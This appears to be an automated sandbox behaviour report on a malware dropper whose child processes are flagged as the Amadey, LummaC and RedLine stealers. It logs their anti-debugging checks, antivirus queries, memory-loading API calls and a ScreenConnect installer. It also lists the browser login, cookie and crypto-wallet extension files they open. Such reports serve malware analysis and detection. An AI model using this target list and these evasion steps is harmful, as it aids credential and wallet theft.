Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1074049001\loqVSeJ.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1074049001\loqVSeJ.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1074049001\loqVSeJ.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1074055001\7fOMOTQ.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1074055001\7fOMOTQ.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1074055001\7fOMOTQ.exe	Process queried: DebugPort	Jump to behavior

Source: C:\Users\user\Desktop\Ryay9q4aDy.exe

Code function: 0_2_04B40C84 rdtsc

0_2_04B40C84

Source: C:\Users\user\AppData\Local\Temp\1074049001\loqVSeJ.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1074056001\5bzo1pz.exe	Process token adjusted: Debug

Source: C:\Users\user\AppData\Local\Temp\1074049001\loqVSeJ.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

.NET source code references suspicious native API functions

Source: 14.0.5bzo1pz.exe.bc09d4.2.raw.unpack, WindowsMemoryNativeLibrary.cs	Reference to suspicious API methods: WindowsNative.VirtualAlloc(attemptImageBase, dwSize, WindowsNative.MEM.MEM_COMMIT \| WindowsNative.MEM.MEM_RESERVE, WindowsNative.PAGE.PAGE_READWRITE)
Source: 14.0.5bzo1pz.exe.bc09d4.2.raw.unpack, WindowsMemoryNativeLibrary.cs	Reference to suspicious API methods: WindowsNative.LoadLibrary(loadedImageBase + ptr[i].Name)
Source: 14.0.5bzo1pz.exe.bc09d4.2.raw.unpack, WindowsMemoryNativeLibrary.cs	Reference to suspicious API methods: WindowsNative.GetProcAddress(intPtr, ptr5)
Source: 14.0.5bzo1pz.exe.bc09d4.2.raw.unpack, WindowsMemoryNativeLibrary.cs	Reference to suspicious API methods: WindowsNative.VirtualProtect(loadedImageBase + sectionHeaders[i].VirtualAddress, (IntPtr)num, flNewProtect, &pAGE)
Source: 14.0.5bzo1pz.exe.bc09d4.2.raw.unpack, WindowsExtensions.cs	Reference to suspicious API methods: HandleMinder.CreateWithFunc(WindowsNative.OpenProcess(processAccess, bInheritHandle: false, processID), WindowsNative.CloseHandle)
Source: 14.0.5bzo1pz.exe.10296dc.1.raw.unpack, Program.cs	Reference to suspicious API methods: FindResource(moduleHandle, e.Name, "FILES")

Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1074049001\loqVSeJ.exe "C:\Users\user\AppData\Local\Temp\1074049001\loqVSeJ.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1074055001\7fOMOTQ.exe "C:\Users\user\AppData\Local\Temp\1074055001\7fOMOTQ.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1074056001\5bzo1pz.exe "C:\Users\user\AppData\Local\Temp\1074056001\5bzo1pz.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1074056001\5bzo1pz.exe	Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\AppData\Local\Temp\setup.msi"

Source: skotes.exe, skotes.exe, 00000003.00000002.2209664898.00000000007CF000.00000040.00000001.01000000.00000007.sdmp	Binary or memory string: Program Manager
Source: loqVSeJ.exe, loqVSeJ.exe, 00000009.00000002.2997733886.000000000051B000.00000040.00000001.01000000.00000009.sdmp	Binary or memory string: ]Program Manager
Source: 7fOMOTQ.exe, 0000000B.00000002.4375966874.00000000002B4000.00000040.00000001.01000000.0000000C.sdmp	Binary or memory string: #Program Manager

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1074049001\loqVSeJ.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1074049001\loqVSeJ.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1074055001\7fOMOTQ.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1074055001\7fOMOTQ.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1074056001\5bzo1pz.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1074056001\5bzo1pz.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1074049001\loqVSeJ.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1074049001\loqVSeJ.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1074049001\loqVSeJ.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1074049001\loqVSeJ.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1074049001\loqVSeJ.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1074049001\loqVSeJ.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1074049001\loqVSeJ.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1074049001\loqVSeJ.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1074049001\loqVSeJ.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1074049001\loqVSeJ.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1074049001\loqVSeJ.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1074055001\7fOMOTQ.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\msiexec.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\rundll32.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\MSI6AD3.tmp-\Microsoft.Deployment.WindowsInstaller.dll VolumeInformation
Source: C:\Windows\SysWOW64\rundll32.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\MSI6AD3.tmp-\ScreenConnect.InstallerActions.dll VolumeInformation
Source: C:\Windows\SysWOW64\rundll32.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\MSI6AD3.tmp-\ScreenConnect.Core.dll VolumeInformation

Source: C:\Users\user\AppData\Local\Temp\1074049001\loqVSeJ.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: 7fOMOTQ.exe, 7fOMOTQ.exe, 0000000B.00000003.4329987890.00000000012EA000.00000004.00000020.00020000.00000000.sdmp, 7fOMOTQ.exe, 0000000B.00000003.4329519448.0000000001366000.00000004.00000020.00020000.00000000.sdmp, 7fOMOTQ.exe, 0000000B.00000003.4329519448.000000000136C000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

Source: C:\Users\user\AppData\Local\Temp\1074049001\loqVSeJ.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
Source: C:\Users\user\AppData\Local\Temp\1074049001\loqVSeJ.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
Source: C:\Users\user\AppData\Local\Temp\1074049001\loqVSeJ.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiSpyWareProduct
Source: C:\Users\user\AppData\Local\Temp\1074049001\loqVSeJ.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntiSpyWareProduct
Source: C:\Users\user\AppData\Local\Temp\1074049001\loqVSeJ.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct
Source: C:\Users\user\AppData\Local\Temp\1074049001\loqVSeJ.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct
Source: C:\Users\user\AppData\Local\Temp\1074055001\7fOMOTQ.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

Stealing of Sensitive Information

Yara detected Amadey

Source: Yara match

File source: decrypted.memstr, type: MEMORYSTR

Yara detected Amadeys stealer DLL

Source: Yara match	File source: 0.2.Ryay9q4aDy.exe.130000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.skotes.exe.5e0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.skotes.exe.5e0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.2163811009.0000000000131000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2200330802.00000000005E1000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.2209594785.00000000005E1000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY

Yara detected LummaC Stealer

Source: Yara match	File source: Process Memory Space: 7fOMOTQ.exe PID: 972, type: MEMORYSTR
Source: Yara match	File source: 11.2.7fOMOTQ.exe.d0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000B.00000002.4375724429.00000000000D1000.00000040.00000001.01000000.0000000C.sdmp, type: MEMORY
Source: Yara match	File source: sslproxydump.pcap, type: PCAP

Yara detected RedLine Stealer

Source: Yara match	File source: dump.pcap, type: PCAP
Source: Yara match	File source: 9.2.loqVSeJ.exe.370000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000009.00000003.2643491766.0000000004B70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2997665741.0000000000372000.00000040.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.3001587383.0000000004F90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: loqVSeJ.exe PID: 2848, type: MEMORYSTR

Found many strings related to Crypto-Wallets (likely being stolen)

Source: loqVSeJ.exe	String found in binary or memory: scord\Local Storage\leveldb\tdataAtomicWalletv10/C \EtFile.IOhereuFile.IOm\walFile.IOletsESystem.UItherSystem.UIeumElectrum[AStrin
Source: 7fOMOTQ.exe	String found in binary or memory: \??\C:\Users\user\AppData\Roaming\ElectronCash\wallets
Source: loqVSeJ.exe	String found in binary or memory: eexpiry*.vstring.ReplacedfJaxxpath
Source: 7fOMOTQ.exe	String found in binary or memory: window-state.json
Source: loqVSeJ.exe	String found in binary or memory: e\Exodus\exodus.walletnanjmdknhkinifnkgdcggcfnhdaammmjtdataexpires_utc\Program Data\coMANGOokies.sqMANGOlitessfnExodusDisplayVer
Source: loqVSeJ.exe	String found in binary or memory: e\Exodus\exodus.walletnanjmdknhkinifnkgdcggcfnhdaammmjtdataexpires_utc\Program Data\coMANGOokies.sqMANGOlitessfnExodusDisplayVer
Source: 7fOMOTQ.exe	String found in binary or memory: Wallets/Ethereum
Source: 7fOMOTQ.exe, 0000000B.00000003.4312946761.0000000001346000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
Source: 7fOMOTQ.exe, 0000000B.00000003.4311715043.0000000001351000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: keystore

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\AppData\Local\Temp\1074055001\7fOMOTQ.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\logins.json	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1074055001\7fOMOTQ.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1074055001\7fOMOTQ.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1074055001\7fOMOTQ.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1074055001\7fOMOTQ.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1074055001\7fOMOTQ.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1074055001\7fOMOTQ.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cert9.db	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1074055001\7fOMOTQ.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1074055001\7fOMOTQ.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1074055001\7fOMOTQ.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1074055001\7fOMOTQ.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1074055001\7fOMOTQ.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1074055001\7fOMOTQ.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1074055001\7fOMOTQ.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1074055001\7fOMOTQ.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1074055001\7fOMOTQ.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1074055001\7fOMOTQ.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1074055001\7fOMOTQ.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1074055001\7fOMOTQ.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1074055001\7fOMOTQ.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1074055001\7fOMOTQ.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1074055001\7fOMOTQ.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1074055001\7fOMOTQ.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1074055001\7fOMOTQ.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1074055001\7fOMOTQ.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1074055001\7fOMOTQ.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1074055001\7fOMOTQ.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1074055001\7fOMOTQ.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1074055001\7fOMOTQ.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1074055001\7fOMOTQ.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1074055001\7fOMOTQ.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1074055001\7fOMOTQ.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1074055001\7fOMOTQ.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1074055001\7fOMOTQ.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1074055001\7fOMOTQ.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1074055001\7fOMOTQ.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1074055001\7fOMOTQ.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1074055001\7fOMOTQ.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1074055001\7fOMOTQ.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1074055001\7fOMOTQ.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1074055001\7fOMOTQ.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1074055001\7fOMOTQ.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1074055001\7fOMOTQ.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1074055001\7fOMOTQ.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1074055001\7fOMOTQ.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1074055001\7fOMOTQ.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1074055001\7fOMOTQ.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1074055001\7fOMOTQ.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1074055001\7fOMOTQ.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1074055001\7fOMOTQ.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1074055001\7fOMOTQ.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1074055001\7fOMOTQ.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1074055001\7fOMOTQ.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1074055001\7fOMOTQ.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddfffla	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1074055001\7fOMOTQ.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1074055001\7fOMOTQ.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1074055001\7fOMOTQ.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1074055001\7fOMOTQ.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1074055001\7fOMOTQ.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1074055001\7fOMOTQ.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1074055001\7fOMOTQ.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1074055001\7fOMOTQ.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\prefs.js	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1074055001\7fOMOTQ.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1074055001\7fOMOTQ.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1074055001\7fOMOTQ.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1074055001\7fOMOTQ.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh	Jump to behavior
